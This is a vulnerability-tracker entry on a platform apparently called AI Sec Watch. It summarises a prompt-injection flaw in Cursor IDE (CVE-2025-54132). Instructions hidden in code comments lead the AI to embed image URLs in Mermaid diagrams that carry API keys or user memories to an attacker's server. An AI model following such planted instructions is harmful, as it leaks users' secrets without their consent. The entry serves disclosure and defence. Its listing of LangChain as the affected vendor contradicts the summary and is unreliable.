AI Sec Watch: A Security Intelligence Platform for AI Systems

Luu, T.J.

Cursor IDE: Arbitrary Data Exfiltration Via Mermaid (CVE-2025-54132)

highnews

security

Source: Embrace The RedAugust 4, 2025

Summary

Cursor IDE (an AI-powered code editor) has a vulnerability where it can render Mermaid diagrams (a tool for creating flowcharts and diagrams from simple text) that include external image requests without user confirmation. An attacker can use prompt injection (tricking the AI by hiding malicious instructions in code comments or other inputs) to embed image URLs in these diagrams, allowing them to steal sensitive data like API keys or user memories by encoding that information in the URL sent to an attacker-controlled server.

Classification

Attack Type

Prompt InjectionData Extraction

Attack SophisticationModerate

Impact (CIA+S)

confidentiality

Affected Vendors

LangChain

Related Issues

critical

CVE-2024-27444: langchain_experimental (aka LangChain Experimental) in LangChain before 0.1.8 allows an attacker to bypass the CVE-2023-

Same vendorNVD/CVE Database

critical

CVE-2025-45150: Insecure permissions in LangChain-ChatGLM-Webui commit ef829 allows attackers to arbitrarily view and download sensitive

First tracked: February 12, 2026 at 02:20 PM

Classified by LLM (prompt v3) · confidence: 92%